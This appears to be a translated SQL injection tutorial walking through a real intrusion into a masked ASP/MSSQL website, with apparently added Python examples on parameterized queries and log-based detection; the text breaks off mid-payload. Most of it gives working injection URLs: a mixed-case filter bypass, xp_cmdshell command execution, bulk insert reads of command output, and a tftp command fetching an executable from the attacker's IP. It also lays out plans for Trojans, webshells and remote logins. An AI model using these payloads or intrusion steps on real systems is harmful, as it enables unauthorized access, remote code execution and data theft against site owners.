Error Analysis and penetration technology in SQL Injection

Source: Internet
Author: User
Tags: bulk insert, mssql server

Introduction: This article describes some ideas and solutions for special problems encountered during SQL injection, including manual injection syntax and penetration-testing reasoning. I would like to share it with beginner friends who are just starting out: I have mastered a few techniques and hope that by sharing them we can learn and improve together.

I believe everyone has mastered the usual method of detecting and exploiting injection: add a single quote, then and 1=1 and and 1=2. That is indeed how to judge whether a parameter is injectable, but it is far from enough for real penetration work. The example discussed here can be identified as injectable by that method, yet it cannot be injected with tools. So we will inject manually, and analyze and interpret the error messages we encounter at each stage of the injection.

Example: http://www.*****.com/zhuanti/zt.asp?Id=34

Adding a single quotation mark returns an error.
Adding and 1=1 returns the page normally.
Adding and 1=2 returns an error.
Good, so let's inject with a tool and look at the result.
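The single-quote / and 1=1 / and 1=2 oracle above works only because the Id value is pasted straight into the SQL text. The following Python is an added example, not code from the original article: it puts the vulnerable lookup beside a parameterized one and runs the article's four probes against both, using an in-memory SQLite table as a stand-in for the real ASP page and MSSQL database (the table name and contents are constructed assumptions).

```python
import sqlite3

def build_db():
    """Constructed stand-in for the article's topic table (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE zhuanti (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO zhuanti VALUES (?, ?)",
                     [(33, "topic 33"), (34, "topic 34"), (35, "topic 35")])
    return conn

def lookup_concatenated(conn, raw_id: str):
    """Vulnerable form: the request value is pasted into the SQL text,
    exactly the pattern that made zt.asp?Id=34 react to ' / and 1=1 / and 1=2."""
    sql = f"SELECT id, title FROM zhuanti WHERE id = {raw_id}"
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, raw_id: str):
    """Hardened form: validate the type, then bind the value as a parameter
    so the database never sees it as SQL."""
    if not raw_id.isdigit():
        raise ValueError("Id must be a non-negative integer")
    return conn.execute("SELECT id, title FROM zhuanti WHERE id = ?",
                        (int(raw_id),)).fetchall()

def probe(conn, lookup, values):
    """Run one lookup over a list of request values and record either the rows
    or the error class, mirroring the 'normal page / error page' oracle."""
    out = {}
    for v in values:
        try:
            out[v] = ("rows", lookup(conn, v))
        except Exception as e:
            out[v] = ("error", type(e).__name__)
    return out

# The four probes the article uses to judge the injection point.
PROBES = ["34", "34'", "34 and 1=1", "34 and 1=2"]

if __name__ == "__main__":
    conn = build_db()
    print("concatenated:", probe(conn, lookup_concatenated, PROBES))
    print("parameterized:", probe(conn, lookup_parameterized, PROBES))
```

With concatenation the three responses differ (rows, syntax error, rows, no rows), which is the oracle the rest of the article builds on; with the parameterized lookup every malformed value is rejected the same way before any SQL runs, so the page no longer leaks anything about query structure.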

[Figure 1]

The current connection user name, database name, and permission level are shown: the connection is SA, which is a lot of privilege. Let's see whether commands can be executed: open NBSI's command tool and list drive C. The result shows nothing; listing the directory again gives the same result, still empty.
[Figure 2]

At this point most beginners would probably get stuck. Is there really no way forward? Of course there is! This injection point filters certain keywords, so the tool cannot be used, but the injection still succeeds if you change the case of those keywords. The detailed steps for injecting this site manually follow.

Intrusion idea: since the injection point runs as SA, the first thing to consider is executing commands, adding a user, and logging on over 3389. If 3389 is not enabled, try using commands to perform some upload operation, for example HTTP, FTP or TFTP upload, then upload a Trojan and run it. If commands cannot be executed, you can also find the web root directory, obtain a webshell through differential backup or LOG backup, then restore command execution, upload the Trojan and run it.

Using the injection point above as an example, how do we determine whether it can execute commands? As we have seen, tool injection is useless here, so how can we tell manually? We can first create a table, then execute the xp_cmdshell stored procedure to create a directory on drive C, then use the xp_subdirs stored procedure to read the subdirectories of drive C into the table, and finally use brute-force table-reading injection statements to read the table contents; that tells us whether the directory was created. If it was, commands can be executed. The injection statements are as follows:

(1) http://www.*****.com/zhuanti/zt.asp?Id=34;Create table temp (id nvarchAr(255), num1 nvarchAr(255), num2 nvarchAr(255), num3 nvarchAr(255));--
(2) http://www.*****.com/zhuanti/zt.asp?Id=34;eXec master.dbo.xp_cmDshell 'md c:\cxd'--
(3) http://www.*****.com/zhuanti/zt.asp?Id=34;Insert into temp (id) eXec master.dbo.xp_subdirs 'c:\';--
(4) http://www.*****.com/zhuanti/zt.asp?Id=34 and (Select top 1 id from temp)>0--
(5) http://www.*****.com/zhuanti/zt.asp?Id=34 and (Select id from (Select top 1 * from (Select top 2 * from temp order by 1) T order by 1 desc) S)>0--
(6) http://www.*****.com/zhuanti/zt.asp?Id=34 and (Select id from (Select top 1 * from (Select top x * from temp order by 1) T order by 1 desc) S)>0--

However, an error occurs when the first statement is executed. Normally the table creation command runs without problems at an injection point, but this one reports an error.
[Figure 3]

The message is: there is already an object named temp in the database.
Question 1: does this database really already have a temp table? Fine, let's drop the previous table first. The statement is:
http://www.*****.com/zhuanti/zt.asp?Id=34;Drop table temp--
But this errors as well, and the message is: cannot drop the table, because it does not exist. That is strange: creating the table fails because it already exists, and dropping it fails because it does not exist? Try again and create a table temp1; the message is: there is already an object named temp1 in the database.
Question 2: is the database playing games with us, knowing in advance that we will create a table and then delete it, and working one step ahead? It is unlikely that a database is that intelligent. There is only one possibility: our injection statement was submitted more than once. After the first execution succeeds, every re-execution naturally produces a "table already exists" error on creation and a "table does not exist" error on deletion. This has not been verified yet, but since the table was evidently created successfully, we submit statements (2) to (4) in turn to expose the id column of the first record of temp. The result: cxd. Haha, as I expected, a directory named cxd exists on drive C, which means the injection point can execute commands. Next, submit statement (5) to read the second record of temp; the returned content is still cxd. Then submit:
http://www.*****.com/zhuanti/zt.asp?Id=34 and (Select id from (Select top 1 * from (Select top 3 * from temp order by 1) T order by 1 desc) S)>0--
The third record is still cxd. Continue with:
http://www.*****.com/zhuanti/zt.asp?Id=34 and (Select id from (Select top 1 * from (Select top x * from temp order by 1) T order by 1 desc) S)>0--
Change x to 4, 5, 6, 7, 8 in turn. With x=4 the output is still cxd; from x=5 on, the output becomes: Documents and Settings. So records 1 to 4 are identical, and records 5 to 8 are identical. That finally confirms my inference: the same statement was executed four times, so one insert statement produced four records, and that is also why table creation reported an error. Therefore any returned information is only a reference; it is not necessarily correct and may be misleading. During injection we must work out which responses are true and which are false.
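The "four identical records" artifact is easy to reproduce offline, which makes it a useful sanity check when reading results like the ones above. The following Python is an added example, not code from the original article: it builds the article's temp table in an in-memory SQLite database, runs the insert step a chosen number of times (as a resubmitted request would), walks the rows with the same "first x rows, then the last of those" pattern the article uses, and collapses the walk into runs so a repeated submission stands out. SQLite has no TOP, so LIMIT replaces it, and COLLATE NOCASE mimics the case-insensitive ordering of a default MSSQL collation; the directory names are constructed.

```python
import sqlite3

# Constructed stand-in for what xp_subdirs 'c:\' returned on the article's
# target: the two names the article actually recovered, plus one more.
SUBDIRS = ["cxd", "Documents and Settings", "Program Files"]

def build_temp(times: int):
    """Create the article's temp(id, num1, num2, num3) table and run the
    INSERT ... EXEC step `times` times, as happens when a request is resubmitted."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE temp (id TEXT, num1 TEXT, num2 TEXT, num3 TEXT)")
    for _ in range(times):
        conn.executemany("INSERT INTO temp (id) VALUES (?)", [(d,) for d in SUBDIRS])
    return conn

def nth_record(conn, x: int):
    """The article's walk: take the first x rows ordered by column 1, then the
    last of those in reverse order. LIMIT stands in for TOP (assumption)."""
    row = conn.execute(
        "SELECT id FROM (SELECT * FROM temp ORDER BY id COLLATE NOCASE LIMIT ?) T "
        "ORDER BY id COLLATE NOCASE DESC LIMIT 1", (x,)).fetchone()
    return row[0] if row else None

def walk(conn, upto: int):
    """Read records 1..upto the way the article does, one request per record."""
    return [nth_record(conn, x) for x in range(1, upto + 1)]

def dedupe_groups(values):
    """Collapse a walk into (value, run_length) pairs. A constant run length
    greater than 1 across every value is the tell-tale of a repeated insert."""
    groups = []
    for v in values:
        if groups and groups[-1][0] == v:
            groups[-1] = (v, groups[-1][1] + 1)
        else:
            groups.append((v, 1))
    return groups

if __name__ == "__main__":
    for times in (1, 4):
        conn = build_temp(times)
        print(f"insert ran {times}x:", dedupe_groups(walk(conn, 3 * times)))
```

With the insert run four times the walk returns cxd for x=1..4 and Documents and Settings for x=5..8, exactly the pattern the article observed; with a single run each name appears once. The run length therefore tells you how many times the stacked statement actually executed, which is the number every later "read record x" request has to be divided by.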

OK, the injection point can execute commands. The next step is to scan its ports with a scanner to see whether 3389 is open. The scan result: only ports 21 and 80 are open. So adding a user and logging on over 3389 is of no use; let's try TFTP upload instead. The injection statement is:
http://www.*****.com/zhuanti/zt.asp?Id=34;eXec master.dbo.xp_cmDshell 'tftp -i 221.121.125.20 get ps.exe c:\ps.exe'--
Note: 221.121.125.20 is the public IP address of my machine; tftp -i 221.121.125.20 get ps.exe c:\ps.exe downloads ps.exe from my machine and saves it as c:\ps.exe in the root of the target's drive C. Run tftpd32.exe on the local machine before submitting; the program can be found on the Internet, and its graphical interface is self-explanatory.

[Figure 4]
After clicking submit, the TFTPD32 window shows no reaction at all. When a machine connects and downloads, the TFTPD32 window displays the peer's IP address and the name of the downloaded file, so the MSSQL server is probably on an intranet without Internet access, or is blocked by a firewall. Now that we can execute commands, how can we go further and determine whether the MSSQL server is on an intranet or on the Internet, which anti-virus software and firewall are installed, or anything else we are interested in?

Intrusion idea: use the xp_cmdshell stored procedure to run commands and save their output to disk, then read the file into a table with the bulk insert statement, then use injection statements to brute-force the table contents; now we can see the command output.
(1) http://www.*****.com/zhuanti/zt.asp?Id=34;eXec master.dbo.xp_cmDshell 'ipconfig /all > c:\cxd.txt'--
Note: runs ipconfig /all via xp_cmdshell and saves the result to c:\cxd.txt.
(2) http://www.*****.com/zhuanti/zt.asp?Id=34;Create table foo (line varchar(8000))--
(3) http://www.*****.com/zhuanti/zt.asp?Id=34;bulk iNsert foo from 'c:\cxd.txt'--
Note: bulk insert reads the text file c:\cxd.txt into the table foo.
(4) http://www.*****.com/zhuanti/zt.asp?Id=34 and (sElect top 1 line from foo)>0--
Brute-forces the first record of table foo.
(5) http://www.*****.com/zhuanti/zt.asp?Id=34 and (sElect line from (sElect top 1 * from (sElect top 5 * from foo order by 1) T order by 1 desc) S)>0--
Brute-forces the fifth record, that is, the second line of c:\cxd.txt (as explained above, every four records form a group).
And so on, until all the content has been exposed.
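Both injection sequences in this article (the case-changed create table / xp_cmdshell / xp_subdirs statements earlier, and the xp_cmdshell-to-file plus bulk insert sequence just above) got past the site's keyword filter purely by changing letter case. The following Python is an added example, not code from the original article: it models a case-sensitive blocklist of the kind that was evidently in front of zt.asp, and beside it a detector that URL-decodes, lowercases and whitespace-normalizes the query string before matching, run over a few constructed IIS-style log lines whose query strings mirror the article's payloads. The log lines, the blocklist and the indicator list are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style request lines: date, time, method, path, query string.
# The query strings mirror the article's payloads; %5C is an encoded backslash.
SAMPLE_LOG = [
    "2024-01-01 10:00:01 GET /zhuanti/zt.asp Id=34",
    "2024-01-01 10:00:02 GET /zhuanti/zt.asp Id=34+and+1=1",
    "2024-01-01 10:00:03 GET /zhuanti/zt.asp Id=34;Create+table+temp+(id+nvarchAr(255));--",
    "2024-01-01 10:00:04 GET /zhuanti/zt.asp Id=34;eXec+master.dbo.xp_cmDshell+'md+c:%5Ccxd'--",
    "2024-01-01 10:00:05 GET /zhuanti/zt.asp Id=34;bulk+iNsert+foo+from+'c:%5Ccxd.txt'--",
    "2024-01-01 10:00:06 GET /zhuanti/zt.asp Id=34+and+(Select+top+1+id+from+temp)>0--",
]

# A case-sensitive, lower-case-only blocklist (assumed): the kind of filter the
# article's target evidently had, which is why the tool's payloads failed.
NAIVE_BLOCKLIST = ["exec", "xp_cmdshell", "create table", "bulk insert", "select"]

# Indicators for the normalized detector (assumed list, not exhaustive).
INDICATORS = {
    "stacked_query": r";\s*(exec|insert|create|delete|drop|bulk)\b",
    "xp_cmdshell": r"\bxp_cmdshell\b",
    "xp_subdirs": r"\bxp_subdirs\b",
    "bulk_insert": r"\bbulk\s+insert\b",
    "create_table": r"\bcreate\s+table\b",
    "boolean_probe": r"\band\s+\d+\s*=\s*\d+\b",
    "subselect": r"\(\s*select\b",
}

def normalize(query: str) -> str:
    """URL-decode, lowercase and collapse whitespace so letter case and
    '+'/'%20' encodings no longer affect matching."""
    decoded = unquote_plus(query)
    return re.sub(r"\s+", " ", decoded).lower().strip()

def naive_filter_blocks(query: str) -> bool:
    """Case-sensitive substring match on the raw query string."""
    return any(word in query for word in NAIVE_BLOCKLIST)

def detect(query: str) -> list:
    """Return the names of all indicators present in the normalized query."""
    q = normalize(query)
    return [name for name, pat in INDICATORS.items() if re.search(pat, q)]

def parse_line(line: str) -> dict:
    """Split one constructed log line into its fields."""
    date, time, method, path, query = line.split(" ", 4)
    return {"date": date, "time": time, "method": method, "path": path, "query": query}

def scan(log_lines) -> list:
    """Score every line with both approaches so they can be compared."""
    results = []
    for line in log_lines:
        q = parse_line(line)["query"]
        results.append({"query": q, "naive": naive_filter_blocks(q), "hits": detect(q)})
    return results

if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(f"naive_blocked={str(r['naive']):5} hits={r['hits']} :: {r['query']}")
```

Every one of the mixed-case payloads passes the naive blocklist untouched, while the normalized detector flags the stacked statements, the extended stored procedures, the bulk insert and the boolean probes; normalizing before matching (and, better, not relying on keyword filtering at all but on parameterized queries and disabling xp_cmdshell) is the point.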

[Figure 5: result]

We can see that this machine is on an intranet.
Its IP addresses are:
IP Address ......: 192.168.0.123
IP Address ......: 192.168.0.7
Its gateway is:
Default Gateway...: 192.168.0.1
Intranet machines are tricky; I don't know whether this one can reach the Internet.
We can have this machine ping www.tom.com. The injection statements are as follows:
(1) http://www.*****.com/zhuanti/zt.asp?Id=34;eXec master.dbo.xp_cmDshell 'ping www.tom.com > c:\cxd.txt'--
(2) http://www.*****.com/zhuanti/zt.asp?Id=34;dElete from foo-- (clears the table contents)
(3) http://www.*****.com/zhuanti/zt.asp?Id=34;bulk iNsert foo from 'c:\cxd.txt'--
(4) http://www.*****.com/zhuanti/zt.asp?Id=34 and (sElect line from (sEl
